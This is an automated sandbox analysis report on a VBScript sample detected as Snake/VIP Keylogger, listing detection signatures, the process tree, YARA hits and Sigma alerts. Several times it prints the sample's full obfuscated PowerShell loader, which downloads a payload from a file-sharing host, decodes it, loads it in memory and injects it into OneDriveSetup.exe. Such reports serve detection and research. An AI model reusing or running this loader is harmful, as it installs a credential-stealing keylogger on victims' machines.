Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Doc261124.vbs

Overview

General Information

Sample name:Doc261124.vbs
Analysis ID:1562920
MD5:3e9ccaacccb792299a0b1c12b537817e
SHA1:4f2707cf3bc5216ab4e41265c00a9264edb3edd6
SHA256:5a813cfc61c2b1c738d0c5785812dc28f461631a70d98b970fc9810f709dbd94
Tags:vbsuser-abuse_ch
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected Powershell download and execute
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VBS Downloader Generic
Yara detected VIP Keylogger
AI detected suspicious sample
Bypasses PowerShell execution policy
Connects to a pastebin service (likely for C&C)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Obfuscated command line found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Script Initiated Connection
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 7800 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Doc261124.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7928 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoIChbc3RySW5nXSR2RXJCb1NlUHJlZkVyZU5DRSlbMSwzXSsnWCctSm9pbicnKSggKCgnRUlIaW1hZ2VVcmwnKycgPSB6TnFodHRwczovLzMxMDUuZmlsZW1haWwuY29tLycrJ2FwaS9maWxlL2dldD9maWxla2V5PXNoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNHRueGxBVmJROTUtZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lJysnMDEwOTYzOGM5YmZiOTU3MTcnKyczMjUzMTMwOWI1ZmY3YyB6TnE7RUlId2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtFSUhpbWFnZUJ5dGVzID0gRUlId2ViQ2xpZW50LkRvd25sb2FkRGF0YShFSUhpbWFnZVVybCk7RUlIaW1hZ2VUZXgnKyd0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoRUlIaScrJ21hZ2VCeXRlcyk7RUlIc3RhcnRGbGFnID0gek5xPDxCQVNFNjRfU1RBUlQnKyc+PnpOcTtFSUgnKydlbmRGbGFnID0gek5xPDxCQVNFNjRfRU5EPj56TnE7RUlIc3QnKydhcnQnKydJbmRleCA9IEVJSGltYWdlVGV4dC5JbmRleE9mJysnKEVJSHN0YXJ0RmxhZyk7RUlIZW4nKydkSW5kZXggPSBFSUhpbWFnZVRleHQuSW5kZScrJ3hPJysnZihFSUhlbicrJ2RGbGFnKTtFSUhzdGFydEluZGV4IC1nZSAwIC1hbmQgRUlIZW5kSW5kZXggLWd0IEVJSHN0YXJ0SW5kZXg7RUlIc3RhcnRJbmRleCArPSBFSUhzdGFydEZsYWcuTGVuZ3RoO0VJSGJhc2U2NExlbmd0aCA9IEVJSGVuZEluZGV4IC0gRUlIc3RhcnRJbmRleDtFSUhiYXNlNjRDb20nKydtYW5kID0gRUlIaW1hZ2VUZXh0LlN1YnN0cmluZygnKydFSUhzdGFydEluZGV4LCBFSUhiYXNlJysnNjRMZW5ndGgpO0VJSGJhc2U2NFJldmVyc2VkID0gJysnLWpvaW4gKEVJSGJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBPVEYgRm9yRWFjaC1PYmplY3QgeyBFSUhfIH0pWy0xLi4tJysnKEVJSGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07RScrJ0lIY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhFSUgnKydiYXNlJysnNjRSZXZlcnNlZCk7RUlIbG9hZGVkQXNzZW1ibHkgPSBbUycrJ3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKEVJSGNvbW1hbmQnKydCeXRlcyk7RUlIdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCh6TnFWQUl6TnEpO0VJSHZhaU1ldGhvZC5JbnZva2UoRUlIbnVsbCwgQCh6TnF0eHQucnNlZy95ZicrJ2cnKycvdWUucmVsbG9ydycrJ3Noc3VwLnYnKydicy8vOnAnKyd0dGgnKyd6TnEsIHpOcWRlc2F0JysnaXZhZG96TnEsIHpOcWRlc2EnKyd0aXZhZG96JysnTnEsIHpOJysncWRlc2F0aXZhZG96TnEsJysnIHpOcWRlc2F0aXZhZG96TnEsIHpOcTEnKyd6TnEsIHpOcU9uZURyaXZlU2V0dXB6TnEsIHpOcWRlc2F0aXZhZG96TnEsIHpOcWRlc2F0aXZhZG96TnEsek5xZGVzYXRpdmFkb3pOcSx6TnFkJysnZXNhdGl2YWRvek5xLHpOcWRlc2F0aXZhJysnZG96TnEsek5xMXpOcSx6TnFkZXMnKydhdCcrJ2l2YWRvek5xKSk7JykgIC1DUkVQbGFjZSd6TnEnLFtDaEFSXTM5IC1yZXBsQWNlIChbQ2hBUl02OStbQ2hBUl03MytbQ2hBUl03MiksW0NoQVJdMzYtcmVwbEFjZSAoW0NoQVJdNzkrW0NoQVJdODQrW0NoQVJdNzApLFtDaEFSXTEyNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 8064 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( ([strIng]$vErBoSePrefEreNCE)[1,3]+'X'-Join'')( (('EIHimageUrl'+' = zNqhttps://3105.filemail.com/'+'api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e'+'0109638c9bfb95717'+'32531309b5ff7c zNq;EIHwebClient = New-Object System.Net.WebClient;EIHimageBytes = EIHwebClient.DownloadData(EIHimageUrl);EIHimageTex'+'t = [System.Text.Encoding]::UTF8.GetString(EIHi'+'mageBytes);EIHstartFlag = zNq<<BASE64_START'+'>>zNq;EIH'+'endFlag = zNq<<BASE64_END>>zNq;EIHst'+'art'+'Index = EIHimageText.IndexOf'+'(EIHstartFlag);EIHen'+'dIndex = EIHimageText.Inde'+'xO'+'f(EIHen'+'dFlag);EIHstartIndex -ge 0 -and EIHendIndex -gt EIHstartIndex;EIHstartIndex += EIHstartFlag.Length;EIHbase64Length = EIHendIndex - EIHstartIndex;EIHbase64Com'+'mand = EIHimageText.Substring('+'EIHstartIndex, EIHbase'+'64Length);EIHbase64Reversed = '+'-join (EIHbase64Command.ToCharArray() OTF ForEach-Object { EIH_ })[-1..-'+'(EIHbase64Command.Length)];E'+'IHcommandBytes = [System.Convert]::FromBase64String(EIH'+'base'+'64Reversed);EIHloadedAssembly = [S'+'ystem.Reflection.Assembly]::Load(EIHcommand'+'Bytes);EIHvaiMethod = [dnlib.IO.Home].GetMethod(zNqVAIzNq);EIHvaiMethod.Invoke(EIHnull, @(zNqtxt.rseg/yf'+'g'+'/ue.rellorw'+'shsup.v'+'bs//:p'+'tth'+'zNq, zNqdesat'+'ivadozNq, zNqdesa'+'tivadoz'+'Nq, zN'+'qdesativadozNq,'+' zNqdesativadozNq, zNq1'+'zNq, zNqOneDriveSetupzNq, zNqdesativadozNq, zNqdesativadozNq,zNqdesativadozNq,zNqd'+'esativadozNq,zNqdesativa'+'dozNq,zNq1zNq,zNqdes'+'at'+'ivadozNq));') -CREPlace'zNq',[ChAR]39 -replAce ([ChAR]69+[ChAR]73+[ChAR]72),[ChAR]36-replAce ([ChAR]79+[ChAR]84+[ChAR]70),[ChAR]124))" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • OneDriveSetup.exe (PID: 7588 cmdline: "C:\Windows\SysWOW64\OneDriveSetup.exe" MD5: 0EA845F896C821E04009C0336D7547EC)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
Doc261124.vbsJoeSecurity_VBS_Downloader_GenericYara detected VBS Downloader GenericJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000006.00000002.2693722953.0000000000400000.00000040.00000400.00020000.00000000.sdmpMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
    • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
    • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
    • 0x1300:$s3: 83 EC 38 53 B0 A4 88 44 24 2B 88 44 24 2F B0 A3 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
    • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
    • 0x1fdd0:$s5: delete[]
    • 0x1f288:$s6: constructor or from DllMain.
    00000006.00000003.1720983716.0000000006951000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000006.00000003.1720983716.0000000006951000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
        00000006.00000003.1720983716.0000000006951000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          00000006.00000003.1720983716.0000000006951000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
          • 0x35918:$a1: get_encryptedPassword
          • 0x358ec:$a2: get_encryptedUsername
          • 0x359b0:$a3: get_timePasswordChanged
          • 0x358c8:$a4: get_passwordField
          • 0x3592e:$a5: set_encryptedPassword
          • 0x356fb:$a7: get_logins
          • 0x30fbe:$a10: KeyLoggerEventArgs
          • 0x30f8d:$a11: KeyLoggerEventArgsEventHandler
          • 0x357cf:$a13: _encryptedPassword
          Click to see the 26 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          6.2.OneDriveSetup.exe.400000.0.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
          • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
          • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
          • 0x1300:$s3: 83 EC 38 53 B0 A4 88 44 24 2B 88 44 24 2F B0 A3 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
          • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
          • 0x1fdd0:$s5: delete[]
          • 0x1f288:$s6: constructor or from DllMain.
          6.2.OneDriveSetup.exe.400000.0.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
          • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
          • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
          • 0x700:$s3: 83 EC 38 53 B0 A4 88 44 24 2B 88 44 24 2F B0 A3 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
          • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
          • 0x1e9d0:$s5: delete[]
          • 0x1de88:$s6: constructor or from DllMain.
          6.2.OneDriveSetup.exe.8b00f20.3.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            6.2.OneDriveSetup.exe.8b00f20.3.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
              6.2.OneDriveSetup.exe.8b00f20.3.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                Click to see the 75 entries

                Other

                SourceRuleDescriptionAuthorStrings
                amsi64_8064.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Base64 Encoded PowerShell Command Detected
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoIChbc3RySW5nXSR2RXJCb1NlUHJlZkVyZU5DRSlbMSwzXSsnWCctSm9pbicnKSggKCgnRUlIaW1hZ2VVcmwnKycgPSB6TnFodHRwczovLzMxMDUuZmlsZW1haWwuY29tLycrJ2FwaS9maWxlL2dldD9maWxla2V5PXNoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNHRueGxBVmJROTUtZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lJysnMDEwOTYzOGM5YmZiOTU3MTcnKyczMjUzMTMwOWI1ZmY3YyB6TnE7RUlId2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtFSUhpbWFnZUJ5dGVzID0gRUlId2ViQ2xpZW50LkRvd25sb2FkRGF0YShFSUhpbWFnZVVybCk7RUlIaW1hZ2VUZXgnKyd0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoRUlIaScrJ21hZ2VCeXRlcyk7RUlIc3RhcnRGbGFnID0gek5xPDxCQVNFNjRfU1RBUlQnKyc+PnpOcTtFSUgnKydlbmRGbGFnID0gek5xPDxCQVNFNjRfRU5EPj56TnE7RUlIc3QnKydhcnQnKydJbmRleCA9IEVJSGltYWdlVGV4dC5JbmRleE9mJysnKEVJSHN0YXJ0RmxhZyk7RUlIZW4nKydkSW5kZXggPSBFSUhpbWFnZVRleHQuSW5kZScrJ3hPJysnZihFSUhlbicrJ2RGbGFnKTtFSUhzdGFydEluZGV4IC1nZSAwIC1hbmQgRUlIZW5kSW5kZXggLWd0IEVJSHN0YXJ0SW5kZXg7RUlIc3RhcnRJbmRleCArPSBFSUhzdGFydEZsYWcuTGVuZ3RoO0VJSGJhc2U2NExlbmd0aCA9IEVJSGVuZEluZGV4IC0gRUlIc3RhcnRJbmRleDtFSUhiYXNlNjRDb20nKydtYW5kID0gRUlIaW1hZ2VUZXh0LlN1YnN0cmluZygnKydFSUhzdGFydEluZGV4LCBFSUhiYXNlJysnNjRMZW5ndGgpO0VJSGJhc2U2NFJldmVyc2VkID0gJysnLWpvaW4gKEVJSGJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBPVEYgRm9yRWFjaC1PYmplY3QgeyBFSUhfIH0pWy0xLi4tJysnKEVJSGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07RScrJ0lIY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhFSUgnKydiYXNlJysnNjRSZXZlcnNlZCk7RUlIbG9hZGVkQXNzZW1ibHkgPSBbUycrJ3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKEVJSGNvbW1hbmQnKydCeXRlcyk7RUlIdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCh6TnFWQUl6TnEpO0VJSHZhaU1ldGhvZC5JbnZva2UoRUlIbnVsbCwgQCh6TnF0eHQucnNlZy95ZicrJ2cnKycvdWUucmVsbG9ydycrJ3Noc3VwLnYnKydicy8vOnAnKyd0dGgnKyd6TnEsIHpOcWRlc2F0JysnaXZhZG96TnEsIHpOcWRlc2EnKyd0aXZhZG96JysnTnEsIHpOJysncWRlc2F0aXZhZG96TnEsJysnIHpOcWRlc2F0aXZhZG96TnEsIHpOcTEnKyd6TnEsIHpOcU9uZURyaXZlU2V0dXB6TnEsIHpOcWRlc2F0aXZhZG96TnEsIHpOcWRlc2F0aXZhZG96TnEsek5xZGVzYXRpdmFkb3pOcSx6TnFkJysnZXNhdGl2YWRvek5xLHpOcWRlc2F0aXZhJysnZG96TnEsek5xMXpOcSx6TnFkZXMnKydhdCcrJ2l2YWRvek5xKSk7JykgIC1DUkVQbGFjZSd6TnEnLFtDaEFSXTM5IC1yZXBsQWNlIChbQ2hBUl02OStbQ2hBUl03MytbQ2hBUl03MiksW0NoQVJdMzYtcmVwbEFjZSAoW0NoQVJdNzkrW0NoQVJdODQrW0NoQVJdNzApLFtDaEFSXTEyNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoIChbc3RySW5nXSR2RXJCb1NlUHJlZkVyZU5DRSlbMSwzXSsnWCctSm9pbicnKSggKCgnRUlIaW1hZ2VVcmwnKycgPSB6TnFodHRwczovLzMxMDUuZmlsZW1haWwuY29tLycrJ2FwaS9maWxlL2dldD9maWxla2V5PXNoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNHRueGxBVmJROTUtZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lJysnMDEwOTYzOGM5YmZiOTU3MTcnKyczMjUzMTMwOWI1ZmY3YyB6TnE7RUlId2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtFSUhpbWFnZUJ5dGVz
                  Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
                  Source: Process startedAuthor: Thomas Patzke: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( ([strIng]$vErBoSePrefEreNCE)[1,3]+'X'-Join'')( (('EIHimageUrl'+' = zNqhttps://3105.filemail.com/'+'api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e'+'0109638c9bfb95717'+'32531309b5ff7c zNq;EIHwebClient = New-Object System.Net.WebClient;EIHimageBytes = EIHwebClient.DownloadData(EIHimageUrl);EIHimageTex'+'t = [System.Text.Encoding]::UTF8.GetString(EIHi'+'mageBytes);EIHstartFlag = zNq<<BASE64_START'+'>>zNq;EIH'+'endFlag = zNq<<BASE64_END>>zNq;EIHst'+'art'+'Index = EIHimageText.IndexOf'+'(EIHstartFlag);EIHen'+'dIndex = EIHimageText.Inde'+'xO'+'f(EIHen'+'dFlag);EIHstartIndex -ge 0 -and EIHendIndex -gt EIHstartIndex;EIHstartIndex += EIHstartFlag.Length;EIHbase64Length = EIHendIndex - EIHstartIndex;EIHbase64Com'+'mand = EIHimageText.Substring('+'EIHstartIndex, EIHbase'+'64Length);EIHbase64Reversed = '+'-join (EIHbase64Command.ToCharArray() OTF ForEach-Object { EIH_ })[-1..-'+'(EIHbase64Command.Length)];E'+'IHcommandBytes = [System.Convert]::FromBase64String(EIH'+'base'+'64Reversed);EIHloadedAssembly = [S'+'ystem.Reflection.Assembly]::Load(EIHcommand'+'Bytes);EIHvaiMethod = [dnlib.IO.Home].GetMethod(zNqVAIzNq);EIHvaiMethod.Invoke(EIHnull, @(zNqtxt.rseg/yf'+'g'+'/ue.rellorw'+'shsup.v'+'bs//:p'+'tth'+'zNq, zNqdesat'+'ivadozNq, zNqdesa'+'tivadoz'+'Nq, zN'+'qdesativadozNq,'+' zNqdesativadozNq, zNq1'+'zNq, zNqOneDriveSetupzNq, zNqdesativadozNq, zNqdesativadozNq,zNqdesativadozNq,zNqd'+'esativadozNq,zNqdesativa'+'dozNq,zNq1zNq,zNqdes'+'at'+'ivadozNq));') -CREPlace'zNq',[ChAR]39 -replAce ([ChAR]69+[ChAR]73+[ChAR]72),[ChAR]36-replAce ([ChAR]79+[ChAR]84+[ChAR]70),[ChAR]124))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( ([strIng]$vErBoSePrefEreNCE)[1,3]+'X'-Join'')( (('EIHimageUrl'+' = zNqhttps://3105.filemail.com/'+'api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e'+'0109638c9bfb95717'+'32531309b5ff7c zNq;EIHwebClient = New-Object System.Net.WebClient;EIHimageBytes = EIHwebClient.DownloadData(EIHimageUrl);EIHimageTex'+'t = [System.Text.Encoding]::UTF8.GetString(EIHi'+'mageBytes);EIHstartFlag = zNq<<BASE64_START'+'>>zNq;EIH'+'endFlag = zNq<<BASE64_END>>zNq;EIHst'+'art'+'Index = EIHimageText.IndexOf'+'(EIHstartFlag);EIHen'+'dIndex = EIHimageText.Inde'+'xO'+'f(EIHen'+'dFlag);EIHstartIndex -ge 0 -and EIHendIndex -gt EIHstartIndex;EIHstartIndex += EIHstartFlag.Length;EIHbase64Length = EIHendIndex - EIHstartIndex;EIHbase64Com'+'mand = EIHimageText.Substring('+'EIHstartIndex, EIHbase'+'64Length);EIHbase64Reversed = '+'-join (EIHbase64Command.ToCharArray() OTF ForEach-Object { EIH_ })[-1..-'+'(EIHbase64Command.Length)];E'+'IHcommandBytes = [System.Convert]::FromBase64String(EIH'+'base'+'64Reversed);EIHloade
                  Sigma detected: Potential PowerShell Command Line Obfuscation
                  Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( ([strIng]$vErBoSePrefEreNCE)[1,3]+'X'-Join'')( (('EIHimageUrl'+' = zNqhttps://3105.filemail.com/'+'api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e'+'0109638c9bfb95717'+'32531309b5ff7c zNq;EIHwebClient = New-Object System.Net.WebClient;EIHimageBytes = EIHwebClient.DownloadData(EIHimageUrl);EIHimageTex'+'t = [System.Text.Encoding]::UTF8.GetString(EIHi'+'mageBytes);EIHstartFlag = zNq<<BASE64_START'+'>>zNq;EIH'+'endFlag = zNq<<BASE64_END>>zNq;EIHst'+'art'+'Index = EIHimageText.IndexOf'+'(EIHstartFlag);EIHen'+'dIndex = EIHimageText.Inde'+'xO'+'f(EIHen'+'dFlag);EIHstartIndex -ge 0 -and EIHendIndex -gt EIHstartIndex;EIHstartIndex += EIHstartFlag.Length;EIHbase64Length = EIHendIndex - EIHstartIndex;EIHbase64Com'+'mand = EIHimageText.Substring('+'EIHstartIndex, EIHbase'+'64Length);EIHbase64Reversed = '+'-join (EIHbase64Command.ToCharArray() OTF ForEach-Object { EIH_ })[-1..-'+'(EIHbase64Command.Length)];E'+'IHcommandBytes = [System.Convert]::FromBase64String(EIH'+'base'+'64Reversed);EIHloadedAssembly = [S'+'ystem.Reflection.Assembly]::Load(EIHcommand'+'Bytes);EIHvaiMethod = [dnlib.IO.Home].GetMethod(zNqVAIzNq);EIHvaiMethod.Invoke(EIHnull, @(zNqtxt.rseg/yf'+'g'+'/ue.rellorw'+'shsup.v'+'bs//:p'+'tth'+'zNq, zNqdesat'+'ivadozNq, zNqdesa'+'tivadoz'+'Nq, zN'+'qdesativadozNq,'+' zNqdesativadozNq, zNq1'+'zNq, zNqOneDriveSetupzNq, zNqdesativadozNq, zNqdesativadozNq,zNqdesativadozNq,zNqd'+'esativadozNq,zNqdesativa'+'dozNq,zNq1zNq,zNqdes'+'at'+'ivadozNq));') -CREPlace'zNq',[ChAR]39 -replAce ([ChAR]69+[ChAR]73+[ChAR]72),[ChAR]36-replAce ([ChAR]79+[ChAR]84+[ChAR]70),[ChAR]124))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( ([strIng]$vErBoSePrefEreNCE)[1,3]+'X'-Join'')( (('EIHimageUrl'+' = zNqhttps://3105.filemail.com/'+'api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e'+'0109638c9bfb95717'+'32531309b5ff7c zNq;EIHwebClient = New-Object System.Net.WebClient;EIHimageBytes = EIHwebClient.DownloadData(EIHimageUrl);EIHimageTex'+'t = [System.Text.Encoding]::UTF8.GetString(EIHi'+'mageBytes);EIHstartFlag = zNq<<BASE64_START'+'>>zNq;EIH'+'endFlag = zNq<<BASE64_END>>zNq;EIHst'+'art'+'Index = EIHimageText.IndexOf'+'(EIHstartFlag);EIHen'+'dIndex = EIHimageText.Inde'+'xO'+'f(EIHen'+'dFlag);EIHstartIndex -ge 0 -and EIHendIndex -gt EIHstartIndex;EIHstartIndex += EIHstartFlag.Length;EIHbase64Length = EIHendIndex - EIHstartIndex;EIHbase64Com'+'mand = EIHimageText.Substring('+'EIHstartIndex, EIHbase'+'64Length);EIHbase64Reversed = '+'-join (EIHbase64Command.ToCharArray() OTF ForEach-Object { EIH_ 